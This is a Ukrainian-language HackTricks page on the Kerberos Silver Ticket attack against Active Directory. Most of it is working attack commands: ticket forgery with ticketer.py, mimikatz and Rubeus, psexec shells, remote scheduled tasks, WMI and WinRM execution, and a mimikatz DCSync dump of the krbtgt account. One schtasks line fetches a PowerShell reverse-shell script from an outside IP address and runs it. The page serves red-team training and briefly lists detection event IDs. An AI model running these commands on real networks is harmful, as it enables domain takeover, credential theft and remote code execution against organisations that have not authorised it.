Ukranian - Ht
HackTricks Training Twitter Linkedin Sponsor

Silver Ticket

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Підказка щодо багів: зареєструйтеся на Intigriti, преміальній платформі для багів, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні, і почніть заробляти винагороди до $100,000!

Срібний квиток

Атака Срібний квиток включає в себе експлуатацію сервісних квитків в середовищах Active Directory (AD). Цей метод ґрунтується на отриманні хешу NTLM облікового запису служби, такого як обліковий запис комп'ютера, для підробки квитка служби надання квитків (TGS). За допомогою цього підробленого квитка зловмисник може отримати доступ до конкретних служб в мережі, підробляючи будь-якого користувача, зазвичай маючи на меті адміністративні привілеї. Наголошується, що використання AES ключів для підробки квитків є більш безпечним і менш виявним.

Для створення квитків використовуються різні інструменти в залежності від операційної системи:

На Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

На Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Служба CIFS відзначається як загальна мета для доступу до файлової системи жертви, але інші служби, такі як HOST та RPCSS, також можуть бути використані для завдань та запитів WMI.

Доступні служби

Тип службиКвитки Silver для служб

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Залежно від ОС також:

WSMAN

RPCSS

WinRM

HOST

HTTP

У деяких випадках можна просто запросити: WINRM

Заплановані завдання

HOST

Спільний доступ до файлів Windows, також psexec

CIFS

Операції LDAP, включаючи DCSync

LDAP

Засоби віддаленого керування сервером Windows

RPCSS

LDAP

CIFS

Золоті квитки

krbtgt

За допомогою Rubeus ви можете запитати всі ці квитки, використовуючи параметр:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Події Silver tickets

  • 4624: Вхід в обліковий запис

  • 4634: Вихід з облікового запису

  • 4672: Вхід адміністратора

Зловживання квитками служб

У наступних прикладах уявіть, що квиток отримано, підміняючи обліковий запис адміністратора.

CIFS

З цим квитком ви зможете отримати доступ до папок C$ та ADMIN$ через SMB (якщо вони відкриті) та скопіювати файли на частину віддаленої файлової системи, просто виконавши:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

Ви також зможете отримати оболонку всередині хоста або виконати довільні команди, використовуючи psexec:

pagePsExec/Winexec/ScExec

ХОСТ

З цим дозволом ви можете генерувати заплановані завдання на віддалених комп'ютерах та виконувати довільні команди:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

З цими квитками ви можете виконати WMI в системі жертви:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Знайдіть більше інформації про wmiexec на наступній сторінці:

pageWmicExec

HOST + WSMAN (WINRM)

З доступом до winrm на комп'ютері ви можете отримати доступ до нього та навіть виконати PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Перевірте наступну сторінку, щоб дізнатися більше способів підключення до віддаленого хоста за допомогою winrm:

pageWinRM

Зверніть увагу, що winrm повинен бути активним та слухати на віддаленому комп'ютері для доступу до нього.

LDAP

З цими привілеями ви можете витягти базу даних DC, використовуючи DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Дізнайтеся більше про DCSync на наступній сторінці:

References

pageDCSync

Підказка щодо багів у винагороду: зареєструйтесь на Intigriti, преміальній платформі для пошуку багів, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні, і почніть заробляти винагороди до $100,000!

Навчіться хакінгу AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

PreviousSID-History InjectionNextSkeleton Key

Last updated